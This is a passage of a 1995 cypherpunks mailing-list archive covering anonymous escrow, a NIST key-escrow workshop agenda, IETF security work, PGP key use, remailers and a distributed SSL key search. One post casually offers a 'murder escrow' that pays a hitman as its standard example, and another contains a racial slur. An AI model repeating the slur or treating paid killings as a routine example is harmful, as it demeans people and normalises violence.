Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 From monty.harder at famend.com Fri Sep 1 17:46:10 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Fri, 1 Sep 95 17:46:10 PDT Subject: A problem with anonymity Message-ID: <8B04409.00030003D4.uuout@famend.com> TC> This is one thing that _bonding_ is designed to partially ameliorate. One TC> posts a bond which is greater than the amount being carried, or at least is A variation of a bond is an escrow agent.... Overload Alert: I use "escrow" here in the more mundane sense of the folks who collect your real estate taxes and homeowners' insurance from you 1/12th at a time along with your mortgage payment, for instance. If the buyer has a =nonymous= agent to recieve the payment, which is only released to the seller upon proof(s) of performance (whether in lump sum or on a schedule of staged payments tied to specific milestones in a long-term project) then the buyer has someone to go after in the event of such shenannigans. TC> There are still scams and manouvers to thwart this reputation capital TC> scheme. The agent planning to "defect" (default, split, abscond, renege, TC> etc.) can try to pile up as many pending transactions as possible, TC> anticipating that the various transactees will be unaware of each other. And the escrow method dynamically scales to meet this threat, whereas the bond is static. Of course, the escrow agent will extract his pound of flesh, just as any other form of insurance. Such is the nature of life. * A Liberal puts your money where his mouth is. --- * Monster at FAmend.Com * From hayden at krypton.mankato.msus.edu Fri Sep 1 17:50:45 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 1 Sep 95 17:50:45 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 1 Sep 1995, Michael Froomkin wrote: > I think he would have to be charged first. Have I missed something? > PS when does the statute of limitations run out? I'm assuming that the statute of limitations has run out on most of these things ( I don't know CA law, except to know it's weird :-) What I'm concerned about, and nobody seems to have picked up on it, is that one of the transcripts said that he and a partner beat up a bunch of perps after they tried to surrender and that one of them died(!!). That's murder in my book, and there is non statute of limitations on that, even in California... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMEeOOzokqlyVGmCFAQHB1gP/bGIG1BqSiM7Fmc1H4fEU3Osg/wwBz31T 5sjms6JX9Z5ekW/oL4I3QDnqrW5GiMfWHdJDRNhYU2cQx0+8V6V8muiah/GO/q+P 8v1Hg0nqYW0yBCROrD/S3kfjLViqCfHWo7S5/T9pjDnF3Dq8KT5tRrAKZrTQVfKL B9ZhTLqqwXk= =eFZv -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++** ------END GEEK CODE BLOCK------ From hayden at krypton.mankato.msus.edu Fri Sep 1 17:51:13 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 1 Sep 95 17:51:13 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 1 Sep 1995, Michael Froomkin wrote: > I think he would have to be charged first. Have I missed something? > PS when does the statute of limitations run out? ARGH! Shit. I got my threads confused, thought this about about furman and the OJ Circus. It's been a long week. Sorry folx. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMEeOcjokqlyVGmCFAQGz2QP+IVwINZmPIQ14Kx4GpMJqjLNTWZba87cc 3QhQxbDQMD5CCSbqGsMyQ899jm/lUxdglBmMvjGIz85uSyg9b5gIinyfKs3lZKFd ilICPOJ49r/C/wH2CaokuDCFtSOGLdOL2M7tpV+zNKiUtIk4vbm34T4COvnjy+g1 z3MZsDpSugY= =M7M5 -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++** ------END GEEK CODE BLOCK------ From hallam at w3.org Fri Sep 1 17:58:17 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 1 Sep 95 17:58:17 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: Message-ID: <9509020057.AA17337@zorch.w3.org> I think that two Amnesty policies are being confused. Amnesty does protest on behalf of prisoners of concience in all countries. It also has a rule which means that a group making a protest should come from outside the country concerned, this is a sensible means of preventing Amnesty becomming a vehicle for partisan protests. They have similar rules for when they send observers etc. I don't think that Phil necessarily has to be arrested though. Amnesty might well wish to send someone to the trial to act as an observer. Phill From tcmay at got.net Fri Sep 1 18:13:57 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 18:13:57 PDT Subject: A problem with anonymity Message-ID: At 10:12 PM 9/1/95, MONTY HARDER wrote: >TC> This is one thing that _bonding_ is designed to partially ameliorate. One >TC> posts a bond which is greater than the amount being carried, or at least is > > A variation of a bond is an escrow agent.... > > Overload Alert: I use "escrow" here in the more mundane sense of > the folks who collect your real estate taxes and homeowners' > insurance from you 1/12th at a time along with your mortgage > payment, for instance. > > If the buyer has a =nonymous= agent to recieve the payment, which is >only released to the seller upon proof(s) of performance (whether in >lump sum or on a schedule of staged payments tied to specific milestones >in a long-term project) then the buyer has someone to go after in the >event of such shenannigans. Oh, I agree, of course. Except that the escrow agent need not be a "nonymous" agent, to use Monty's terminology here. The third party escrow agent can of course be a digital pseudonym. (As I keep saying, having the True Name--whatever that means these days--is only one facet, one factor of the overall equation. In some cases, very important, in other cases, less important.) The canonical--if morbid--example is the "Al's Murder Escrow" agent. Al holds the digital money (deposited anonymously, etc.) and doesn't pay the hitter until certain conditions are met. (Chaum has schemes to partly deal with this, but "money mixes" eliminate traceability, but may introduce other issues.) There are of course issues involving the escrow agent deciding not to pay, etc. But most escrow services, like banks, make more money by staying in business than by defrauding customers. (I mention banks because, when you look at it closely, today's banks can quite easily claim that a customer made a withdrawal when he didn't. That they don't says more about the nature of persistent businesses than about any government oversight or security features. This is a side point, but it bears keeping in mind that the real world of banks and businesses, etc., is not fully secure, either. And yet it mostly works pretty well. The reasons for this are interesting to consider.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From nobody at REPLAY.COM Fri Sep 1 18:30:25 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 1 Sep 95 18:30:25 PDT Subject: Key Escrow Workshop agenda & discussion paper 3 Message-ID: <199509020130.DAA17812@utopia.hacktic.nl> Key Escrow Workshop agenda & discussion paper 3 September 1, 1995 Dear Participant: Thank you for agreeing to participate in the two-day meeting on software key escrow encryption. We are anxious to work with you and other industry representatives to facilitate development of exportable key escrow encryption in software products. I look forward to the workshop being an important step in that process. I have attached a draft agenda for the two days. I propose that we spend the majority of our time discussing a set of export criteria. In order to move that discussion along, a draft set of criteria is attached. The criteria state, in general terms, the government's needs with respect to exportable software, consistent with its law enforcement and national security requirements. Since it is important that the final criteria be clear, straightforward, consistent, and implementable, Mike Nelson of the Office of Science and Technology Policy will spend a few minutes describing these criteria on the first morning of the meeting. After that, we would like to hear your perspectives on them and work with you to refine them. On the second day, we plan to discuss the export licensing process for such products, and begin exploring characteristics of acceptable key escrow agents. Again, thank you for your participation. I look forward to seeing you there. Sincerely, / s / Raymond G. Kammer Deputy Director Attachments -------------------------------------------------------- TENTATIVE AGENDA Key Escrow Issues Meeting September 6-7, 1995 National Institute of Standards and Technology Gaithersburg, Maryland Wednesday, September 6, 1995 9:00 Welcome, Agenda Overview, Logistics Ed Roback, NIST 9:10 Review of Meeting Goals Ray Kammer, NIST Deputy Director Session I -- Software Key Escrow Exportability Criteria 9:20 Briefing -- Discussion Draft of Software Key Escrow Export Criteria Michael Nelson, Office of Science and Technology Policy 10:00 Industry Perspectives on Exportability Criteria (Industry briefings/reactions 5-10 minutes max.) 10:45 Break 11:00 Industry Perspectives on Exportability Criteria, continued. 11:45 Discussion of Breakout Session Tasks At registration, you will be asked to sign up for a breakout session. Groups A1, A2: Criterion #2 Groups B1, B2: Criteria #3, 4, 9 Groups C1, C2: Criteria #5, 6 Groups D1, D2: Criteria #7, 8 Criterion #10 is the subject of Session II, and criterion #1 (64-bit) is straight-forward. Breakout room assignments will be announced at this time. 12:00 Lunch (on own, cafeteria available) 1:00 Breakout session #1 Groups will be asked to: 1) determine whether each criterion is clear and, if not, propose appropriate modifications; 2) identify issues (which may arise from the criteria assigned to the group) which need to be addressed, and by whom; and 3) develop technical ideas/approaches for achieving each criterion. 3:00 Break 3:15 Plenary -- Reports from Breakout Session #1 4:00 Breakout Session #2 Participants will be asked to select either a technical or criteria-focused group. Technical groups are asked to: 1) synthesize the proposed technical approaches (just presented in plenary) and identify/discuss the most promising approaches. Criteria focused groups are asked to: 1) look at all criteria and the comments/issues raised and propose ways to reconcile any differences; and 2) prioritize the issues that remain to be addressed, if any, for each criterion. 5:00 End of day Thursday, September 7, 1995 9:00 Plenary -- Reports from Breakout Session #2 9:45 Export Licensing Process Randy Williams, U.S. Dept. of Commerce Dan Cook, U.S. Dept. of State 10:15 Questions / Discussion 10:30 Break Session II -- Desirable Characteristics for Key Escrow Agents 10:45 Panel: Government Perspectives on Key Escrow Agent Issues Geoff Greiveldinger, U.S. Dept. of Justice Ray Kammer, NIST Penny Brummitt, NSA 11:30 Industry Perspectives on K.E. Agent Issues 12:30 Lunch (on own, cafeteria available) 1:30 Breakout Session #3 Each group is asked to identify proposed key criteria for desirable escrow agents. Same groups and room assignments as Breakout session #1. 2:45 Break 3:00 Plenary - Report of Breakout Sessions Session III -- Other Related Issues 3:30 Other Issues This is an opportunity for participants to raise related key escrow issues. 4:30 Follow-up Issues & Wrap-up 4:45 Adjourn Note: The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. _ _ _ 9/1/95 -------------------------------------------------------- Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #3 Export Criteria Discussion Draft -- 64-bit Software Key Escrow Encryption As discussed at the SPA/AEA meeting on August 17, 1995, the Administration is willing to allow the export of software encryption provided that the products use algorithms with key space that does not exceed 64 bits and the key(s) required to decrypt messages/files are escrowed with approved escrow agents. On the same date, the September 6-7 key escrow issues meeting at NIST was also announced. The two principal topics at the meeting will be: discussion of issues of exportability of 64-bit software key escrow encryption and 2) desirable characteristics for key escrow agents. In order to help make most productive use of the limited time available at the upcoming meeting and to better focus deliberation, the following criteria are being distributed for discussion purposes. Since it is important that final criteria be clear, straightforward, consistent, and implementable, please review these draft criteria and be prepared to discuss how they may be refined and made more specific. Draft Export Criteria for Software Key Escrow Encryption Software key escrow encryption products meeting the following criteria will be granted special export licensing treatment similar to that afforded other mass-market software products with encryption. 1. The product will use an unclassified encryption algorithm (e.g., DES, RC4) with a key length not to exceed 64 bits. 2. The product shall be designed to prevent multiple encryption (e.g., triple-DES). 3. The key required to decrypt each message or file shall be accessible through a key escrow mechanism in the product, and such keys will be escrowed during manufacture in accordance with #10. If such keys are not escrowed during manufacture, the product shall be inoperable until the key is escrowed in accordance with #10. 4. The key escrow mechanism shall be designed to include with each encrypted message or file, in a format accessible by authorized entities, the identity of the key escrow agent(s), and information sufficient for the escrow agent(s) to identify the key or key components required to decrypt that message. 5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block). 6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled. 7. The key escrow mechanism allows access to a user's encrypted information regardless of whether that user is the sender or the intended recipient of the encrypted information. 8. The key escrow mechanism shall not require repeated involvement by the escrow agents for the recovery of multiple decryption keys during the period of authorized access. 9. In the event any such product is or may be available in the United States, each production copy of the software shall either have a unique key required for decrypting messages or files that is escrowed in accordance with #10, or have the capability for its escrow mechanism to be rekeyed and any new key to be escrowed in accordance with #10. 10. The product shall accept escrow of its key(s) only with escrow agents certified by the U.S. Government or by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements. Note: Software products incorporating additional encryption methods other than key escrow encryption methods will be evaluated for export on the basis of each encryption method included, as is already the case with existing products. Accordingly, these criteria apply only to the key escrow encryption method incorporated by a software product, and not to other non-escrowed encryption methods it may incorporate. For instance, non-escrowed encryption using a key length of 40 bits or less will continue to be exportable under existing export regulations. - - - Please also review discussion paper #1 (distributed earlier), which raises a number of issues involving exportability criteria and how exportable products could be designed. Discussion paper #2 (also previously distributed) presents questions involving key escrow agents. Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. 9/1/95 From tcmay at got.net Fri Sep 1 18:51:13 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 18:51:13 PDT Subject: Macintosh Users: "SpeedDoubler" Message-ID: For you Macintosh users, I thought I'd share with you my experiences with SpeedDoubler, a new utility that (effectively) doubles or even triples performance of many applications that still are heavily dependent on 68K code (as opposed to purely PowerPC code). My PowerMac 7100av is currently running at 80 MHz, with a 512K L2 cache, and 40 MB of physical RAM. (I can remember when 32K of "core" was a huge amount, and I can remember when Intel supplied 8 MB to CDC for their "Plato" system...at that time, one of the largest solid state memory installations ever.) SpeedDoubler, from Connectix, is a $60-70 (street) product that takes 68K code and makes various optimizations for the PPC. It's effectively the 68K emulator that Apple should have provided. (For you non-Mac users who are reading this, this technology of intercepting and translating code, is likely to be used to get higher performance out of code written ostensibly for one CPU but actually run on a later iteration of the processor. Such as the Pentium or P6 in running 16-bit code.) In Speedometer, I saw a 3.9x increase in "CPU"-related tasks (for 68K code), and a 2.4x increase in a SmalltalkAgents application which is only available at this time in 68K code form. Even the Finder runs faster, as various parts of it are still written in 68K code. So, as many programs are still in 68K code form, and not yet rewritten for the PPC, SpeedDoubler effectively gives you a machine that is almost twice as fast. There may be a few incompatibilities, and I would suggest you read comp.sys.mac.apps and other groups to verify that your critical apps are not having any problems. All I can say is that I'm very happy. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Fri Sep 1 19:12:02 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 19:12:02 PDT Subject: Phil Zimmermann/Amnesty International? Message-ID: At 12:50 AM 9/2/95, Robert A. Hayden wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >On Fri, 1 Sep 1995, Michael Froomkin wrote: > >> I think he would have to be charged first. Have I missed something? >> PS when does the statute of limitations run out? > >I'm assuming that the statute of limitations has run out on most of these >things ( I don't know CA law, except to know it's weird :-) >What I'm concerned about, and nobody seems to have picked up on it, is >that one of the transcripts said that he and a partner beat up a bunch of >perps after they tried to surrender and that one of them died(!!). >That's murder in my book, and there is non statute of limitations on >that, even in California... Zimmermann and which partner? If it was Charlie Merritt, then all I can say is that I'm surprised. Kelly Goen...now there's a possibility. --Tim May P.S. As the thread title--"Re: Phil Zimmermann/Amnesty International?"--suggests, Phil Z. is the subject being discussed. Gary Jeffers made the bizarre speculation that Amnesty International might want to consider Phil a "prisoner of conscience" or a "political prisoner," or somesuch. All Michael Froomkin and others of us were pointing out is that this would be rather difficult, given that Phil has not even been charged, let alone tried, let alone imprisoned. How Mark Furhman migrated into this thread is beyond me. But, then, he killed Ron and Nicole, planted the glove to frame the nigger he hated so much, and was also involved in the bombing of the WTC. That he helped Phil export PGP is thus not surprising. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From robo at c2.org Fri Sep 1 19:36:18 1995 From: robo at c2.org (ROBO Mixmaster Remailer) Date: Fri, 1 Sep 95 19:36:18 PDT Subject: Direct Socket to Remailer? Message-ID: <199509020225.TAA29123@infinity.c2.org> I've heard of telnetting to port 25 to send SEMI-untraceable e-mail. The procedure, quite frankly, sounds rather complicated. Most of my mail that I don't want traced goes through the Mixmaster remailer network. I'm using Winsock-compatible software via a PPP connection. Is it possible, for example, to tell my mailer software to use the remailer itself, such as "remail.obscura.com" as the mail host, rather than "mail.myISP.com"? Will it work, at least for sending, without having an account at "obscura.com", or whatever remailer? Would that be less traceable than sending it through my ISP's mail host? From rsalz at osf.org Fri Sep 1 20:02:30 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 1 Sep 95 20:02:30 PDT Subject: IETF security report Message-ID: <9509020301.AA17722@sulphur.osf.org> >From saag-request at neptune.tis.com Fri Sep 1 19:09:55 1995 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by postman.osf.org (8.6.9/8.6.x) with SMTP id TAA08164 for ; Fri, 1 Sep 1995 19:09:54 -0400 Received: from neptune.tis.com by neptune.TIS.COM id aa06599; 1 Sep 95 16:20 EDT Received: from relay.tis.com by neptune.TIS.COM id aa06595; 1 Sep 95 16:18 EDT Received: from big-screw.mit.edu(18.72.0.176) by relay.tis.com via smap (g3.0.1) id xma004617; Fri, 1 Sep 95 16:07:54 -0400 Received: by big-screw id AA23873; Fri, 1 Sep 95 16:18:03 -0400 Date: Fri, 1 Sep 95 16:18:03 -0400 Message-Id: <9509012018.AA23873 at big-screw> >From: "Jeffrey I. Schiller" Sender: jis at mit.edu To: minutes at cnri.reston.va.us Subject: IETF Security Area Report (July 17-21, 1995: 33rd IETF meeting) Cc: secdir at TIS.COM, saag at TIS.COM Status: R -----BEGIN PGP SIGNED MESSAGE----- IETF Security Area Report Jeff Schiller and Jim Galvin jis at mit.edu galvin at tis.com July 17-21, 1995 The Security Area within the IETF is responsible for development of security oriented protocols, security review of RFCs, development of candidate policies, and review of operational security on the Internet. The Area Director is assisted by a Directorate, an advisory entity with no standards-setting powers. The members of the Security Directorate are as follows. Jeffrey I. Schiller Ran Atkinson Steve Bellovin Steve Crocker Barbara Fraser James M. Galvin Phil Karn Steve Kent John Linn Clifford Neuman Rob Shirey Ted Ts'o In addition to the Directorate the Security Area is assisted by the Security Area Advisory Group (SAAG). The SAAG is an open group that meets at least once during each IETF meeting as well as electronically via the saag at tis.com mailing list. Send a message to the address saag-request at tis.com to join the list. During the Security Area Advisory Group (SAAG) meeting, the activities of the Security Area, including the Directorate, are reported and discussed. In addition, the SAAG meeting provides an opportunity for open discussion of security issues. Included below is a summary from those working groups and birds of a feather sessions with security relevant activities to report and the Security Directorate meeting summary. In addition, the following topics were discussed during the SAAG meeting. o Documents Approved as Proposed Standards The IESG approved the advancement of five of the IPSEC documents to proposed standards. With the advancement of these documents the IPSEC working group will focus on issues related to key management. The IESG approved the advancement of the two MOSS documents to proposed standards. With the advancement of these documents the PEM working group has completed its charter and will be closed. o Domain Name System Security The last revision of the enhancements for the DNS to support security has been released. It will enter working group last call very soon; no issues are expected to be raised. At the end of the working group last call the document will be submitted to the IESG to be considered for publication as a Proposed Standard. An implementation of the specification is available to U.S. and Canadian sites and individuals via anonymous FTP (see ftp://ftp.tis.com/pub/DNSSEC/README for details). o Key Management It was noted that the Internet needs two kinds of key management: one for short-term keys and one for long-term keys. The expected usage of short-term keys would be on a per connection or per message basis. Long-term keys, on the other hand, would probably be used to exchanged short-term keys. The distribution and management of long-term keys requires the existence of a global infrastructure. There are two options for the global infrastructure today: Secure DNS or The Directory (X.500). It is also possible that something completely different will be needed and developed. Key management is expected to get increasing attention in the IETF. o Internet Security Architecture Steve Crocker gave an abbreviated version of his presentation to the IAB the previous evening. He posed a challenge to the community to improve the network security at IETF meetings. The specific proposal is to have IPSEC available with manual keying, which would be enough to make a difference when compared to the current configuration. This should be available for use in the IETF terminal room by both the terminals/workstations and laptops. In addition, we should install a demonstration firewall that is IPSEC friendly. The goal is to make it available at the next IETF meeting in Dallas (December 4-8, 1995). The activity of the following working groups and birds of a feather sessions was reported. o Secure Socket Layer (SSL) BOF A consensus developed for the need for a session layer security protocol. This was predicated on observing that IPSEC is below the transport layer and the session layer is above it, and that implementing security in the transport or network layer would require changes to operating systems. In contrast, session layer security could be implemented and added non-invasively to existing systems, thus making security services available to a broad range of application protocols. As a result, a working group called Session Layer Security will be proposed. The Secure Socket Layer specification will serve as the starting point for the new working group. o Internet Secure Payments Protocol (ISPP) BOF This BOF met two times with more than a dozen technology presentations. Fortunately, the various technologies are much more similar than they are different. The consensus was that the IETF should have one or more working groups in this area. Charters will be proposed and submitted to the area director for consideration. o Simple Key Management for IP (SKIP) BOF SKIP is Sun's proposal for key management on the Internet. It is a competitor to the Photouris specification being discussed in IPSEC. It is still undecided as to whether this specification should be discussed as part of the IPSEC working group or within its own working group. Although there appeared to be consensus to move the SKIP specification onto the standards track, the authors will need to discuss the process and relationship to IPSEC with the area director and the Chairs of the IPSEC working group before this can be done. [Note: Since the IETF meeting took place discussions between the various parties are proceeding. The likely outcome will be for the SKIP work to take place within the IPSEC working group.] o Authenticated Firewall Traversal (AFT) There are currently four implementations underway with interoperability testing expected to begin shortly. If the testing is successful three documents will be submitted to the IESG to be considered for publication as Proposed Standards before the next IETF meeting in Dallas. o Common Authentication Technology (CAT) The CAT working group discussed topics related to active documents, including GSS-V2 (to receive another set of specific revisions at the Internet-Draft level, and then to be recommended for advancement to Proposed Standards), IDUP (where revised interface specifications and a new mechanism specification were discussed, with standards advancement to be considered at the Dallas IETF), GSS-API Negotiation (new draft discussed), Kerberos mechanism and extensions (status and comments discussed, new drafts to follow), FTP Security (to be recommended for advancement to Proposed Standard after inclusion of clarifying revisions), and a presentation of a new mechanism based on FIPS PUB JJJ cryptography. Presentations on work in progress included GSS-API integration into World-Wide Web browsers and servers, loadable GSS-API multi-mechanism support, and discussion of the use of RFC-1731 as a generic framework for integration of security tokens into text-based applications. The group also discussed a range of candidate follow-on topic areas related to authorization, and identified a subset with apparent common value and feasibility for proposals and work by group members. o Web Transaction Security (WTS) There were three short presentations on related subjects and a review of the two documents being developed by the working group. With respect to the requirements specification, several new issues were raised at this meeting and most, but not all, were resolved. There was consensus to resolve the remaining issues on the list and then submit the document to the IESG to be considered for publication as an information RFC. Recent changes to the SHTTP document were reviewed and no objections were raised. An outstanding issue is coordinating SHTTP with MOSS, which is dependent on the harder (and outside our scope) problem of coordinating HTTP with MIME. We remain hopeful that we will reach consensus on a document to propose to advance to Proposed Standard by the next IETF meeting Dallas. o IP Security (IPSEC) The interoperability testing of the recently approved Proposed Standards was discussed. The majority of the meeting was devoted to discussing Internet key management and the two working documents on Photouris and ISAKMP. o Site Security Handbook (SSH) Two documents are expected to be available by the first week of November, which will allow for final revisions to be proposed during the next IETF meeting in Dallas followed by advancing the documents onto the standards track as quickly as possible. The Security Area Directorate met on Monday afternoon for a 2 hour meeting. In addition to all of the above, the following was noted. o Intellectual Property Rights (IPR) The purpose of the discussion was information exchange. Several protocols are pending in the IESG as a result of unresolved IPR issues and several protocols from the security area are about to be submitted to the IESG with unresolved IPR issues. It is uncertain exactly what the outcome will be of any specific case. o Key-ed MD5 Key-ed MD5 is being used in a variety of protocols for authentication. The IETF needs an applicability statement which includes advice on how often to change the secrets. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEdqFMUtR20Nv5BtAQELhwP/eTwVc+07AA19P0Q7KdfHxTAaNjnsPBRY 4bb2ekatHDaL5oVH2bbad1DECgOVU2Y0tKBXBNO3Pw1vQiMOV874ZeMIWNtcuxJE MUcd9PLXekRoIUGmUdQMdnVhGEhb4NWPAi6KXzkWRxLN0wZNG9tyjkb7qLCo0dLe +98gDe4dO1c= =2CtY -----END PGP SIGNATURE----- From hal9001 at panix.com Fri Sep 1 21:38:08 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 1 Sep 95 21:38:08 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: At 12:13 9/1/95, Bill Stewart wrote: >>I do not think that PGP 2.x can easily (ie: Automatically) use one key for >>Signing and another for Encrypting a Message (it does both at the same time >>if you ask). If I "Clear Sign" a message and then Encrypt it, then I get >>the result but I'm not sure if doing the decrypt on such a message will >>automatically spot the signature and verify it (as would occur with a E+S >>pass). > >PGP identifies the key for decryption and signature checking from the message. >When you're signing a message or key, you can pick which of your keys to >use with the -u option. OK - I'll rephrase my query/quandary. If I create a message by feeding in plain text and asking for an Encrypt and Sign is the FORMAT of the resulting file different from one there I Sign the Text and then (in a separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut for the two processes done in sequence using the same key for both operations)? If E+S is only a short-cut then doing the steps separately will give the result that PGP3 will get automatically with its Separate Function Keys Feature. >The difficulty is getting people to use your >encryption key instead of your signature key when encrypting stuff for you. >Derek mentioned one approach (get people to load the encryption key first); >unfortunately, you can't predict their behavior, and if you change encryption >keys more often than signature keys, they'll load the newest encryption key >last. >Another approach is to identify them in the names - my key certification key >says "KeyCert-only" in the text. > >For the problem that started this discussion, though, there's no good solution. >Since the Bad Guys _can_ encrypt a message to you with your signature key, >and send it to you by anonymous remailer, they can plant a reason to suspect >that you may have evidence encrypted with that key. This will all become (more) academic once PGP3 comes out and Sign-Only keys would not be usable for Encryption. From hal9001 at panix.com Fri Sep 1 21:38:32 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 1 Sep 95 21:38:32 PDT Subject: SSL search attack Message-ID: At 12:15 9/1/95, Lou Poppler wrote: >The ACK process and the allocation process are separate, and should >remain so. They run on different servers, and they run as separate >processes in the unix version of brloop. A little tweaking of brloop >could allow pre-fetching of the next segment to search, without any >effect on the ACK process. I dislike the idea of a client sending an ACK >before it has searched the entire segment. I was not suggesting that. I was just suggesting that the initial request be for twice the amount of segments as you want to process during your reporting interval and that except when you are getting ready to shut down, you have one allocation ready as a spare in case you can't immediately be given another allocation when you ACK one. Example: I will be running for 8 Hours and I will report back every 30 minutes. I get an Hours worth of segments (Chunk 1 +2) when I first connect. After 30 Minutes, I'm done with half of them. I then ACK that half (Chunk1) and request another 30 minutes worth of segments (for scanning at 1H-1.5H). If I do not get it, I'm still working on the 2nd Chunk. At 1H, I ACK Chunk2 and ask for Chunk4 (also I ACK Chunk 1 and/or request Chunk 3 if either failed the first time at .5H). This continues until 7.5 when I ACK and do not request a Chunk 17 (since I already have or I am requesting Chunk 16 for the 7.5H-8H period). From hal9001 at panix.com Fri Sep 1 21:38:36 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 1 Sep 95 21:38:36 PDT Subject: SSL search attack Message-ID: At 07:25 9/1/95, Daniel R. Oelke wrote: >> >> I see nothing wrong with the concept of being allocated an initial chunk >> and having the scan software attempt to ACK it when 50% of it has been >> searched. A successful ACK would allow the releasing of a new chunk (in >> response) equal in size to the returned chunk. A failure of the Server to >> accept the ACK would trigger a retry at set intervals (such as 75% and 100% >> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always >> in possession of a Full Sized Chuck to scan (so long as the Server accepts >> an ACK before the 100% done mark) and temporary failures will not stop the >> process of a scanner as currently happens. >> > >The only way this can work is if the server is told it is a 50%/75%/etc >size ACK, and then latter the server is ACKed for the full 100%. > >Why? Because what happens if the client dies immediately after doing >the ACK - maybe only 51% of that space has been searched, yet >the server has already seen an ACK for it. I thought that the ACK gives starting location and number of segments. If I get 500 segments and ACK at the 50% point I am sending an ACK for the Starting Point and 250 Segments (the unprocessed part would then ACK Start+250 for 250 when done) Just as of I had only gotten 250 in the first place and was also given the next 250 Segment Chunk (ie: I was "Next Requester" after my original allocation of 250). >IMO - a % ACK is to much complexity and extra work on the server, >which is already having trouble keeping up. No - It is the same load if you allow the first request to be twice the size of the subsequent requests. If you ask people to request 30 minutes worth of segments, there is no difference in load (if the Server responds to each ACK when first attempted) if they start each run with a 1 hour chunk (ie: 2X Chunk) and check in every 30 min to ACK a Chunk (and to get the one to be worked on in a half an hour [and when you are 30 minutes away from your shut down time, just ACK and do not request another chunk]) and just getting a X sized chunk at your initial connection. In the 2X method, you still have a X sized Chunk to work on for the next 30 Minutes if the Server is ignoring your ACK attempt (and when that Chunk has been scanned you return both and get two more). This is hitting the Server once every 30 minutes and NOT pounding away at it until you get an ACK through (and more get more work) since you have no need for another chunk immediately (as you would with the X sized Chunk every 30 minutes method) and thus have no need to retry on a connect failure. From tcmay at got.net Fri Sep 1 